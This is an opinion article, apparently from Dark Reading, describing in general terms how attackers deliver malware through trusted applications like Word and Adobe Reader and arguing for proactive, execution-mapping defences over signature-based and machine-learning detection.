Cybercriminals are always works in progress. Their knowledge and ability to bypass security systems are constantly advancing. As they gain knowledge, they develop and implement sophisticated impersonation methods that are proving increasingly adept at evading detection and gaining access to secure data. This happens as many of their targets fail to adequately upgrade their security solutions to detect and protect against them. Currently, cybercriminals have many soft targets, and they know what to do to penetrate their systems. This climate that works in favor of the attacker underscores how organizations, as potential targets, need to rethink their approach to data and system security.
One of the most common approaches a cybercriminal takes is to present as an employee or friend of the organization under attack. This is the path of least resistance for introducing malicious code to a system disguised as a trusted application. In this way, and without the proper, updated security protocol in place, hackers fly under the radar to access sensitive information and even extract money. The cost can be steep for an enterprise that is breached in this way. A loss of assets can be crippling, as can the perceived loss of reputation. As these attacks become more common, organizations must prepare and have a modern, flexible security strategy in place that incorporates several layers of security.
How Do Hackers Introduce Malicious Code?
Common and widely used applications such as Microsoft Word and Adobe Reader are trusted, seemingly secure, and able to run code on an individual's computer. This makes these applications popular and effective entry points for hackers to introduce malicious code onto targeted systems.
Hackers are exploiting inherent vulnerabilities within these applications. Typically, the hacker uses a specifically designed link or document that presents itself as legitimate activity, and is sent to the recipient. Once the file or link is clicked, the weakness within the commandeered application allows the attack strain (ransomware, advanced persistent threats, spyware, or any other type of malware) to gain access to the host system.
Once the code penetrates the system, it can be difficult, even impossible, to detect. Remediating malicious code and removing it from an infected system is a difficult process. It is imperative that enterprises deploy security software that protects its data centers and valuable, sensitive information.
Identifying Malicious Code
The typical hacker has been at his or her craft for some time and understands how to exploit a host of security protocols in use today. For example, the traditional signature-based solutions rely on what they have learned from previous attacks to protect networks and systems from inbound threats, but they have little to recommend them in detecting and protecting against evolving and new threats.
Microsoft's Windows Malicious Software Removal Tool was developed to protect the Windows operating system. It looks at a computer, searches for malware, and eliminates it upon discovery. However, its soft spot is that it reacts to an attack after it has happened rather than providing proactive protection. Once a virus has gained access to a data center or network, it is more difficult to detect and remove, especially as it is likely it has already caused damage.
Machine learning solutions, which are considered more advanced, also rely on what has happened in the past to identify malicious code. Machine learning solutions have higher detection rates, but they cannot anticipate a cyberattack until one has already occurred from which it can learn. This is not an effective method against any new or emerging threats.
The Path to Cybersecurity
New cyber threats are emerging regularly and the solution to them lies in an aggressive, pre-emptive, proactive posture. Successful and secure organizations must begin to think this way if they want true data security.
To do this, organizations must pivot in their security mindset and begin to implement solutions that take a comprehensive look and map all legitimate executions of an application based on the codes written by its creators, such as Microsoft and Adobe. With that map, they can identify any inconsistencies or deviation from their source code. Recognized patterns and actions can then be confirmed in real time, while unidentified activities are reviewed and blocked instantaneously.
A proactive approach is a critical mindset change and an imperative if companies want to ensure they are in control of their network security. If organizations remain reactive, they will continue to consume valuable resources and risk their reputations as they chase after and remediate the mess left after the cyberattack has happened.
Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry's most knowledgeable IT security experts. Check out the Interop agenda here.